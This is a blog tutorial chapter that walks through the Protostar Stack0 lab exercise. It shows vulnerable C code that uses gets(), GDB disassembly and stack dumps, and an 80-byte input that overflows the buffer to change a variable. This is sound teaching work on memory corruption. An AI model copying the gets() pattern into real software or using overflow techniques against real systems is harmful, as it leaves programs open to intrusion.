Reverse Engineering and Exploit Development Made Easy - Chapter 3

9 minute read

Reverse Engineering and Exploit Development Made Easy - Chapter 3: Linux BOFs

:~# ./im_back

Hello again fellow geeks! I’m back, bringing you another exciting chapter! I know I know, you’ve missed me. But I’m here to stay now!

In this chapter, we will dive into the basics of Linux exploitation. You will see that in many ways, Linux exploitation is quite similar to Windows.

Most concepts learned in the past will be applied here, so I suggest that you go through the previous chapters before going through this one.

With that being said, let us dive right in!

:~# ./intro

To understand the basics of Linux exploitation, we will be looking at the first form: Stack buffer overflows.

We will start by learning memory corruption, which will give us a good understanding of how memory is treated in Linux, and from there we will gradually make our way into developing a complete exploit.

:~# configure

Protostar’s exploit exercises VM ( https://exploit-exercises.lains.space/protostar/ ) is a great resource that will help us on our journey, along with OverTheWire’s Narnia wargame.

So grab an iso from Protostar, and set it up in your desired virtual machine manager. I will be using VirtualBox as always. We will use ssh to log into this VM ( use hostname –I to get the local IP of the VM).

The default credentials for Protostar are user:user.

:~# setup

For Linux, the choice of debuggers isn’t as varied as Windows. Throughout our journey, we will be mainly using GDB (GNU Debugger), the default debugger that comes with Linux. You can alternatively use EDB.

As we progress, we will see how we can pimp GDB up to do all sorts of cool tricks, and develop exploits with ease (spoiler alert: gdb-peda 😉).

:~# ./code_analysis

To see the source code of the challenge, we have to navigate to the exploit exercises website, where the source code for all challenges is given. We will be starting with the Stack0 challenge, that focuses on memory corruption. Take a look at the code below:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}

The includes are just importing usual C libraries. Stdlib.h is a general-purpose standard library that helps with memory allocation, process control, etc.

Unistd.h is a header file that provides access to the POSIX OS API. Similar to the standard library.

Stdio.h is the standard input/output header file that manages I/O operations.

The main function initializes two variables: buffer, that takes 64 characters, and modified, which is a volatile integer. This means that the variable modified can take multiple values. The main function also takes one user-supplied argument.

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

modified is initially set to 0, and the line below that is responsible for reading the characters in buffer from our input, and printing it on to the screen. The function that does this is gets().

 modified = 0;
 gets(buffer);

Now here is where our vulnerability lies, in the gets() function. The problem with gets() is, if we enter a string that is longer than 64 bytes, gets() does not do any check on the size whatsoever, so it will keep reading our input from the stack until it finds a new line. Which means, our string will OVERFLOW outside the given buffer of 64 bytes, and start to overwrite other variables, until our string ends.

In this case, we need to change the value of the modified variable, that is located somewhere on the stack. The if else conditions tell us that we succeed once we change the value of the modified variable from 0 to anything (I.e. not equal to (!=) 0).

if(modified != 0) {
    printf("you have changed the 'modified' variable\n");
} else {
    printf("Try again?\n");
}

Alrighty then! Now that we have analysed the code completely, let us start debugging the binary in order to understand where our variables lie on the stack, and how our input affects it. I will be using GDB to debug the binary.

So first, fire up the Protostar VM, and use the command hostname -I to display the local IP address of the VM. I suggest that you use a Bridged Adapter while setting up the VM, and set the adapter to the current interface that’s being used. That way, the VM will be on your network and you can easily ssh into it. Binaries are located in /opt/protostar/bin/.

:~# ./debugging

To open the binary in GDB, we will use the command $ gdb stack0, followed by the command (gdb) disas main, which will disassemble the main function for us. What you see is a representation of the binary in assembly.

0x080483f4 <main+0>:	push   %ebp
0x080483f5 <main+1>:	mov    %esp,%ebp
0x080483f7 <main+3>:	and    $0xfffffff0,%esp
0x080483fa <main+6>:	sub    $0x60,%esp
0x080483fd <main+9>:	movl   $0x0,0x5c(%esp)
0x08048405 <main+17>:	lea    0x1c(%esp),%eax
0x08048409 <main+21>:	mov    %eax,(%esp)
0x0804840c <main+24>:	call   0x804830c <gets@plt>
0x08048411 <main+29>:	mov    0x5c(%esp),%eax
0x08048415 <main+33>:	test   %eax,%eax
0x08048417 <main+35>:	je     0x8048427 <main+51>
0x08048419 <main+37>:	movl   $0x8048500,(%esp)
0x08048420 <main+44>:	call   0x804832c <puts@plt>
0x08048425 <main+49>:	jmp    0x8048433 <main+63>
0x08048427 <main+51>:	movl   $0x8048529,(%esp)
0x0804842e <main+58>:	call   0x804832c <puts@plt>
0x08048433 <main+63>:	leave  
0x08048434 <main+64>:	ret

So right off the bat, even if you don’t understand assembly too well, you can see the call instruction, calling the function gets() at the address 0x0804840c. This will come in handy during testing.

So a few things before we continue:

  • ESP is our stack pointer. This points to the start/top of the stack.
  • PUSH is an instruction which pushes a value stored in a particular register to the top of the stack.
  • JMP is an instruction which will jump to a particular address to continue execution flow. JE is “jump if equal to”, which means that after the comparison (the test instruction), if the condition is satisfied, it will jump to said location. This represents the “if-else” iteration in our code.

Our objective here is to change the value of the modified variable from 0 to anything else. Modified is somewhere on the stack, and in order to overwrite it with our desired value, we will have to overflow a section of the stack that lies before this variable in order to reach it.

There is one line in the disassembly that is particularly interesting though. It moves the value of 0 (hex 0x0) to the location esp + 0x5c. This tells us the location of the modified variable on the stack. Now, we will use the previous call instruction, and this one to set our breakpoints. A breakpoint is a pause in the execution flow of the binary, which will help us in understanding how values on the stack change after a particular instruction is executed.

We will do this by executing:

(gdb) break *0x0804840c
Breakpoint 1 at 0x804840c: file stack0/stack0.c, line 11.
(gdb) break *0x08048411
Breakpoint 2 at 0x8048411: file stack0/stack0.c, line 13.
(gdb)

This will stop the execution flow before the call to gets() is made, and after that, before the value of modified is transferred to the accumulator (eax) for comparison. Now, let’s run the binary by executing r.

(gdb) r
Starting program: /opt/protostar/bin/stack0

Breakpoint 1, 0x0804840c in main (argc=1, argv=0xbffffd54) at stack0/stack0.c:11

So we hit our first breakpoint, right before the call to gets(). If we run i r, it will give us further information on the registers at this point of time.

(gdb) i r
eax            0xbffffc5c	-1073742756
ecx            0x644d8780	1682802560
edx            0x1	1
ebx            0xb7fd7ff4	-1208123404
esp            0xbffffc40	0xbffffc40
ebp            0xbffffca8	0xbffffca8
esi            0x0	0
edi            0x0	0
eip            0x804840c	0x804840c <main+24>
eflags         0x200282	[ SF IF ID ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51

We can see that the address of the call instruction is in the EIP register. EIP holds the address to the next instruction which is to be executed. Now, let’s take a look at what the stack looks like right now by executing x/30wx $esp.This will print 32 hexadecimal words off the stack. 30 has just been taken for simplicity purposes.

(gdb) x/32wx $esp
0xbffffc40:	0xbffffc5c	0x00000001	0xb7fff8f8	0xb7f0186e
0xbffffc50:	0xb7fd7ff4	0xb7ec6165	0xbffffc68	0xb7eada75
0xbffffc60:	0xb7fd7ff4	0x08049620	0xbffffc78	0x080482e8
0xbffffc70:	0xb7ff1040	0x08049620	0xbffffca8	0x08048469
0xbffffc80:	0xb7fd8304	0xb7fd7ff4	0x08048450	0xbffffca8
0xbffffc90:	0xb7ec6365	0xb7ff1040	0x0804845b	0x00000000
0xbffffca0:	0x08048450	0x00000000	0xbffffd28	0xb7eadc76
0xbffffcb0:	0x00000001	0xbffffd54	0xbffffd5c	0xb7fe1848

We can use this to find the location of the modified variable. To find the address, we execute x/wx $esp+0x5c, as we know from earlier that the variable is stored at the location $esp+0x5c or 0x5c(%esp). x/wx stands for ‘examine’, so this will give us the address and the contents of modified.

(gdb) x/wx $esp+0x5c
0xbffffc9c:	0x00000000

From this, we can see that the address of modified on the stack is 0xbffffc9c, and it contains 0. So if we correspond this with our stack print from earlier, this is where modified is:

                          These are contents
           |---------------------|----------------------|
           |                                            |
0xbffffc90: 0xb7ec6365	0xb7ff1040 0x0804845b 0x00000000 <---- modified

Addresses:  0xbffffc90  0xbffffc94 0xbffffc98 0xbffffc9c

Each address here is 4 bytes long, so the contents of c90 is given after the colon. If we add 4 bytes after c90 three times until we reach 0x0000000, we get the address as c9c. This is how the math works out in GDB.

Now, let’s continue execution flow by executing c. Then, let’s just enter a few A’s just as a test. That way, we will know the location of our buffer on the stack.

(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 2, main (argc=1, argv=0xbffffd54) at stack0/stack0.c:13
13	in stack0/stack0.c

We hit our second breakpoint, which is right before the binary moves the value of modified to EAX for the comparison (The if-else iteration). Now, let’s take a look at the stack:

(gdb) x/32wx $esp
0xbffffc40:	0xbffffc5c	0x00000001	0xb7fff8f8	0xb7f0186e
0xbffffc50:	0xb7fd7ff4	0xb7ec6165	0xbffffc68	0x41414141
0xbffffc60:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc70:	0x41414141	0x41414141	0xbffffc00	0x08048469
0xbffffc80:	0xb7fd8304	0xb7fd7ff4	0x08048450	0xbffffca8
0xbffffc90:	0xb7ec6365	0xb7ff1040	0x0804845b	0x00000000 <-----
0xbffffca0:	0x08048450	0x00000000	0xbffffd28	0xb7eadc76
0xbffffcb0:	0x00000001	0xbffffd54	0xbffffd5c	0xb7fe1848

So the hexadecimal value of A is 0x41. We can see our A’s starting at 0xbffffc60. This suggests that our buffer starts at this address. We can also see that we still have not reached the modified variable, which is why we haven’t been able to overwrite the value. Remember the size of our buffer? 64. If we enter about 80 A’s, we may be able overflow the modified variable and change it’s value. Let’s give this a shot:

(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/stack0

Breakpoint 1, 0x0804840c in main (argc=1, argv=0xbffffd54) at stack0/stack0.c:11
11	in stack0/stack0.c
(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 2, main (argc=1, argv=0xbffffd54) at stack0/stack0.c:13
13	in stack0/stack0.c

(gdb) x/32wx $esp
0xbffffc40:	0xbffffc5c	0x00000001	0xb7fff8f8	0xb7f0186e
0xbffffc50:	0xb7fd7ff4	0xb7ec6165	0xbffffc68	0x41414141
0xbffffc60:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc70:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc80:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc90:	0x41414141	0x41414141	0x41414141	0x41414141 <----
0xbffffca0:	0x41414141	0x41414141	0x41414141	0xb7eadc00
0xbffffcb0:	0x00000001	0xbffffd54	0xbffffd5c	0xb7fe1848

Et voila! We have overwritten the value of the modified variable, and also overwritten variables after that with out A’s. Let’s do this outside of GDB now:

$ echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | ./stack0
you have changed the 'modified' variable
Segmentation fault

We have completed our first memory corruption exercise! This lays the foundation for stack buffer overflows, so if you’ve made it this far give yourself a good pat on the back! That’s all for now! I’ll see you in the next post!